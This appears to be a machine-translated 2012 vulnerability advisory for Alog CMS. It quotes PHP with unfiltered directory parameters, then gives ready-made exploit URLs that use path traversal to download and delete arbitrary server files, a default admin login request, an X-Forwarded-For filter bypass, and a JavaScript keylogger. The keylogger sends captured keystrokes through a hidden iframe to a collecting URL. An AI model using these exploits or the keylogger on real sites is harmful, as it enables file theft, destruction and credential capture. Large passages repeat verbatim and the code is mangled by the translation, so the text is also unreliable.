Alog CMS system XSS arbitrary File Download read vulnerability-vulnerability warning-the black bar safety net

2012-11-22T00:00:00
ID MYHACK58:62201235680
Type myhack58
Reporter 佚名
Modified 2012-11-22T00:00:00

Description

| Alog CMS

Background any download any remove any of the columns of the directory

漏洞 文件 :admin/mod/uploadfile.mod.php

$baseDir = SITE_ROOT.'static/upload/'; $currentDir = $_GET['dir'] ? $_GET['dir'] : ($_POST['dir'] ? $_POST['dir'] : "); //without any filter $currentPath = $baseDir.$ currentDir;

Any download $uploadfile = $_GET['uploadfile'] ? $currentPath.'/'.$ _GET['uploadfile'] : $currentPath; //$_GET['uploadfile']the file name is not often any security filtering if (@is_file($uploadfile)) //if file exists download { $fileName = basename($uploadfile); $fileNameInfo = explode('.', $fileName); $fileType = $filename_info[count($fileNameInfo) - 1]; header('Content-type: application/x-'.$ fileType); header('Content-Disposition: attachment; filename='.$ fileName); header('Content-Description: PHP3 Generated Data'); readfile($uploadfile); exit; } EXP http://localhost/upload/admin/index.php?m=uploadfile&a=download&dir=advertisiment/../../../admin&uploadfile=index.php

http://localhost/upload/admin/index.php?m=uploadfile&a=delete&dir=&uploadfile=advertisiment/../../../2.php

http://localhost/upload/admin/index.php?m=login&a=login http://localhost/upload/admin/index.php?m=login&a=login userName=admin&password=admin&VCode=anqm&lang=zh-cn

Traverse the directory file

Message Board X-Forwarded-For can bypass lead cross-site

Heads: X-Forwarded-For:192.168.1.1

Alog CMS

Background any download any remove any of the columns of the directory

漏洞 文件 :admin/mod/uploadfile.mod.php

$baseDir = SITE_ROOT.'static/upload/'; $currentDir = $_GET['dir'] ? $_GET['dir'] : ($_POST['dir'] ? $_POST['dir'] : "); //without any filter $currentPath = $baseDir.$ currentDir;

Any download $uploadfile = $_GET['uploadfile'] ? $currentPath.'/'.$ _GET['uploadfile'] : $currentPath; //$_GET['uploadfile']the file name is not often any security filtering if (@is_file($uploadfile)) //if file exists download { $fileName = basename($uploadfile); $fileNameInfo = explode('.', $fileName); $fileType = $filename_info[count($fileNameInfo) - 1]; header('Content-type: application/x-'.$ fileType); header('Content-Disposition: attachment; filename='.$ fileName); header('Content-Description: PHP3 Generated Data'); readfile($uploadfile); exit; } EXP http://localhost/upload/admin/index.php?m=uploadfile&a=download&dir=advertisiment/../../../admin&uploadfile=index.php

http://localhost/upload/admin/index.php?m=uploadfile&a=delete&dir=&uploadfile=advertisiment/../../../2.php

http://localhost/upload/admin/index.php?m=login&a=login http://localhost/upload/admin/index.php?m=login&a=login userName=admin&password=admin&VCode=anqm&lang=zh-cn

Traverse the directory file

Message Board X-Forwarded-For can bypass lead cross-site

Heads: X-Forwarded-For:192.168.1.1

Cross site assist to delete the background file

Get the background path monitoring input character 1. js

var keys; //save keyboard recording var key; document. onkeypress = function(e) { //hijacking the keyboard message function get = window. event ? event:e;//create the event object key = get. keyCode ? get. keyCode : get. charCode; switch(key){ case 3 2 : key = '[Space]';break; case 1 3 : key = '[Enter]';break; default : key = String. fromCharCode(key); keys += key; //alert(key+"||"+keys); }

Cross site assist to delete the background file

Get the background path monitoring input character 1. js

var keys; //save keyboard recording var key; document. onkeypress = function(e) { //hijacking the keyboard message function get = window. event ? event:e;//create the event object key = get. keyCode ? get. keyCode : get. charCode; switch(key){ case 3 2 : key = '[Space]';break; case 1 3 : key = '[Enter]';break; default : key = String. fromCharCode(key); keys += key; //alert(key+"||"+keys); } } function f() { $url=escape(window. location. pathname); ifm=document. createElement("IFRAME"); document. body. appendChild(ifm); ifm. width=0; ifm. height=0; ifm. src="http://localhost/upload/7.php?x="+$url+"//"+keys; } window. setInterval(f,5 0 0 0) //setTimeout(f,"1 0 0 0");